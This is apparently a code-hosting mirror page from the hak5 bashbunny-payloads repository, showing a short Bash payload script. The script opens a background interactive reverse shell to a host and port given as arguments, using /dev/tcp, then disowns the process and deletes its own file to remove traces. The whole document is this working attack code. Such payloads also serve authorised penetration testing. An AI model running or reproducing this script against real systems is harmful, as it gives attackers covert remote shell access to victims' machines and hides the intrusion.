mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-12-20 03:58:25 +00:00
8 lines
105 B
Bash
8 lines
105 B
Bash
#!/bin/bash
|
|
A="$0"
|
|
H=$1
|
|
P=$2
|
|
/bin/bash -c /bin/bash -i > /dev/tcp/$H/$P 0<&1 2>&1 &
|
|
disown $!
|
|
rm -f "$A"
|